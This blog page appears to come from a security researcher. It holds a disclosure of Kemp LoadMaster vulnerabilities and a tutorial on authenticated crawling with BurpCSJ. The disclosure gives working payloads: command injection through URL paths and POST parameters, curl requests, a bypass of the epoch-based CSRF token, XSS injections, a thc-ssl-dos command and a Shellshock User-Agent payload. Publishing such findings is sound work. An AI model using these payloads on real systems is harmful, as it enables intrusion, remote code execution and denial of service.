Wednesday, 1 April 2015

Playing with Kemp Load Master


The Kemp Virtual LoadMaster is a virtual load-balancer appliance that comes with a web administrative interface. I had a chance to test it, and this blog post summarises some of the most interesting vulnerabilities I discovered which have not been published yet. For those of you who want to try it as well, you can get a free trial version here: http://kemptechnologies.com/server-load-balancing-appliances/virtual-loadbalancer/vlm-download

By default, the Kemp web administrative interface is protected by Basic authentication, so the vulnerabilities discussed below can be exploited by attacking an authenticated user via CSRF- or XSS-based attacks.

The following vulnerabilities were discovered while looking at Kemp Load Master v7.1-16; some of them should be fixed in the latest version (7.1-20b or later).

The change log entry for the fixed issues reads as follows:

"PD-2183 Functions have been added to sanitize input in the WUI in order to resolve some security issues – fix for CVE-2014-5287 and CVE-2014-5288".

Remote Code Execution - status: fixed in 7.1-20b (reported in June 2014) - CVE-2014-5287/5288

An interesting remote code execution vector can be found through the attack payload below:

http://x.x.x.x/progs/fwaccess/add/1|command

The web application functionality is based on multiple bash scripts contained in the /usr/wui/progs folder. The application uses CGI, so these scripts handle HTTP requests directly.

The main page "fwaccess" executes the following function:

[snip] from /usr/wui/progs/fwaccess



We notice that if the result of the command on line 285 is not positive (check on line 286), the seterrmsg function is called.

The seterrmsg function is defined in /usr/wui/progs/util.sh and it is shown below:


On line 318 we see a dangerous "eval" against our parameters. By simply injecting a few special characters, the seterrmsg function is invoked and returns plenty of interesting information:

http://x.x.x.x/progs/fwaccess/add/1'ls

Response:

HTTP/1.1 200 OK
Date: Sat, 27 Dec 2014 23:25:55 GMT
Server: mini-http/1.0 (unix)
Connection: close
Content-Type: text/html
/usr/wui/progs/util.sh: eval: line 318: unexpected EOF while looking for matching `''
/usr/wui/progs/util.sh: eval: line 319: syntax error: unexpected end of file

Line 318 contains an eval against $@ (which holds our arguments). The arguments are passed via the fwaccess page, where IFS is set to the slash ("/") separator, so each segment of the URL path becomes a separate argument.
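The vendor's source is not reproduced here in full, but based on the error output above, a minimal reconstruction of the vulnerable pattern would look something like the snippet below (the variable name and the surrounding logic are assumptions; only the unquoted eval of $@ is confirmed by the errors):

# Reconstruction of the pattern in /usr/wui/progs/util.sh - not the vendor's exact code
seterrmsg()
{
    # "$@" holds the attacker-controlled path components, already split on "/"
    # because the calling fwaccess page sets IFS=/
    eval errmsg=$@   # unquoted eval: a value such as 1|ls ends up being executed
                     # as errmsg=1|ls, which bash treats as a pipeline and runs ls
}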

By attempting the request below, it is possible to achieve code execution:

http://x.x.x.x/progs/fwaccess/add/1|ls

Response:


Lines 120 and 190 report an "integer expression expected" error, as our argument "1|ls" is obviously no longer an integer. However, the command execution works fine, as the pipe character redirects into the "ls" command.
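Assuming valid credentials for the administrative user (bal on a default installation; the password below is a placeholder), the same request can be reproduced from the command line:

curl -u 'bal:PASSWORD' 'http://x.x.x.x/progs/fwaccess/add/1|id'

The single quotes only stop the local shell from interpreting the pipe; the appliance receives it verbatim and ends up running id.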

The application is flawed in many other places as well, including via HTTP POST requests, as shown below:



Other injection points that were found:

Page: /progs/geoctrl/doadd
Method: POST
Parameter: fqdn

Page: /progs/networks/hostname
Method: POST
Parameter: host

Page: /progs/networks/servadd
Method: POST
Parameter: addr

Page: /progs/useradmin/setopts
Method: POST
Parameter: xuser
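The POST-based points above can be abused in the same way. A sketch (the parameter value is only illustrative, the credentials are placeholders, and the exact payload syntax may differ per parameter):

curl -u 'bal:PASSWORD' 'http://x.x.x.x/progs/networks/hostname' --data 'host=lb01|id'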

So how can we exploit all this goodness?

CSRF (Cross Site Request Forgery) - status: not fixed - reported in June 2014

We can use another vulnerability, such as CSRF - most of the pages of the administrative interface are vulnerable to this attack, so even though a user is authenticated via Basic authentication, a forged request will make the browser attach the credentials to the HTTP request automatically.

Interestingly enough, there is some kind of protection against CSRF for critical functions, such as factory reset, shutdown and reset. However, it is flawed as well, as the "magic" token matches the Unix epoch timestamp, so it is predictable and can be passed within the request (see below):
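The screenshot of the forged request is not reproduced here, but the key point is that an epoch-based token offers no protection, since the attacker can compute a valid value at request time. A sketch (the endpoint and parameter name below are placeholders, not the real ones):

# the "magic" anti-CSRF value is simply the current Unix epoch time
MAGIC=$(date +%s)
curl -u 'bal:PASSWORD' 'http://x.x.x.x/progs/CRITICAL_FUNCTION' --data "magic=$MAGIC"

In a real CSRF scenario the same value would be embedded by the attacker's page, and the victim's browser would attach the Basic-auth credentials automatically.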


Reflected and Stored XSS - status: partially fixed - reported in June 2014

Another way to attack users is via XSS - in this case, we have plenty of options, as both reflected and stored XSS are present. For instance, an attacker might chain CSRF -> stored XSS -> BeEF just to achieve persistence.

Reflected XSS was found on this point:

Page: /progs/useradmin/setopts
Method: POST
Parameter: xuser

Example payload:
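The original screenshot of the payload is not reproduced here; an illustrative request (the payload and credentials are examples, not the author's original) could look like this:

curl -u 'bal:PASSWORD' 'http://x.x.x.x/progs/useradmin/setopts' --data 'xuser=<script>alert(1)</script>'

In the CSRF/XSS chain described above, the same request would of course be issued from the victim's browser rather than from curl.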


Stored XSS was found on the following points:

Page: /progs/geoctrl/doadd
Method: POST
Parameter: fqdn

Rendered page: /progs/geoctrl/fqdn


Further injection points:

Page: /progs/fwaccess/add/0
Method: POST
Parameter: comment

Page: /progs/doconfig/setmotd
Method: POST
Parameter:

BeEF Module

As part of this research, I have developed a BeEF module that takes advantage of chaining these vulnerabilities together. It is always sweet to use an XSS as a starting point to achieve code execution against an appliance.

The github pull request for the module can be found here, and below you can find a video of it in action:



For this module, I wanted to use the beef.net.forge_request() function with the POST method, which is required to exploit the RCE vectors above. However, the POST method was not usable at the moment of writing this module, and @antisnatchor was very quick to fix it. So if you want to try it, ensure you have the latest version of BeEF installed.


Extra - bonus

Denial of Service - status: unknown - reported in June 2014

It appears the thc-ssl-dos tool can bring down the Kemp Load Master administrative interface, which is served over SSL. The same applies if a balanced service is using SSL via the Kemp Load Master.
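For reference, the tool is typically invoked along these lines (the --accept flag acknowledges the tool's terms of use; port 443 is assumed here for the administrative interface):

thc-ssl-dos --accept x.x.x.x 443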

Shell-shock - status: unknown - reported in 2015

Obviously, the application is not immune to the infamous shell-shock vulnerability. This was found by my friend Paul Heneghan and then by a user complaining on the vendor's blog (the comment was removed shortly after).

For those of you who are more curious, the shell-shock vulnerability works perfectly via the User-Agent header, in version 7.1-18 and possibly in version 7.1-20 as well.
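A classic way to test it is the sketch below; the target just needs to be one of the bash CGI pages, and whether the command output actually shows up in the response depends on how the CGI wrapper invokes bash:

curl -u 'bal:PASSWORD' -H 'User-Agent: () { :; }; echo Content-Type: text/plain; echo; /usr/bin/id' 'http://x.x.x.x/progs/fwaccess'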



Funnily enough, Kemp provides Web Application Firewall protection, but I wonder how they can "prevent" the OWASP Top Ten (as they claim here), if their main product is affected by so many critical vulnerabilities ;-)

If you are keen for an extra-extra bonus, keep reading...

Extra - extra bonus:

No license, no web authentication

If you manage to invalidate your license, you will be presented with a page such as the one below:



However, most of the underlying functionality is still available and "attackable" without the need for Basic authentication. You can invalidate the license with a CSRF request that sets the system time far in the future ;-)
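As a sketch, and assuming fwaccess is among the pages still reachable in this state, the earlier injection then works with no credentials at all:

curl 'http://x.x.x.x/progs/fwaccess/add/1|id'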

Hope you enjoyed the post - I am sure there are other vulnerabilities in this product. If you find them, please let me know.

Friday, 29 August 2014

BurpCSJ - Dealing with authentication

I have received many questions on how to properly handle authentication when using BurpCSJ, so here is a short tutorial on how to manage it. If you are looking for how to use this Burp extension in general, here is a basic tutorial as well.

In this post, we are going to use BurpCSJ against the Altoro bank (a deliberately vulnerable web application), which is available online here: http://demo.testfire.net/

First, start clean (the reasons will be clear at the end of this tutorial):

- Start Burp;
- Start browser and configure proxy settings to work with Burp;
- Browse to target site: http://demo.testfire.net/
- Perform login: user: jsmith - password: Demo1234
- Check the Burp cookie jar (under Options / Sessions); it should be populated with some cookies:


- Configure BurpCSJ (Crawljax tab) and make sure that "Use Manual Proxy" is ticked and pointing to Burp, and that the "Use cookie jar" option is ticked as well:



- Start/Launch BurpCSJ against the target site (right-click, "Send URL to Crawljax" option). When BurpCSJ launches Crawljax, you will notice that the first request has no "Cookie" header - this is normal: WebDriver needs to initialise first, so no worries.



- The second or third request (depending on whether there is a redirection) and all subsequent requests performed by Crawljax will include the valid cookies from the cookie jar.

You are now performing an authenticated crawling session and if you check the browser managed by WebDriver, you should notice that it is using a valid authenticated session.

In case you do not follow the first two steps, you might end up having some issues and failing to run a proper authenticated crawling session. This has happened to me quite a few times...

Let's say that you have already started the browser and logged in, and only then you enable the Burp proxy and run BurpCSJ. The issue is that Burp has no history of the Set-Cookie directive, so it will identify the cookies sent by the browser and populate the cookie jar using the parent domain only as a reference.

Below, you can see the issue by comparing the cookies in the browser and the ones in the Burp cookie jar. Can you spot the difference? ;-)

If this happens, a BurpCSJ crawl against demo.testfire.net would not use the cookies in the Burp cookie jar, as demo.testfire.net does not match testfire.net. So no authenticated crawling session in this case...

So don't be lazy if you have to restart/clean the browser from time to time... ;-)

The latest Crawljax package has fixed multiple issues. I have noticed the crawler is more diligent and sticks to the target domain instead of visiting other pages from out-of-scope domains.

As usual, feedback is more than welcome - feel free to contact me or raise GitHub issues: https://github.com/malerisch/burpcsj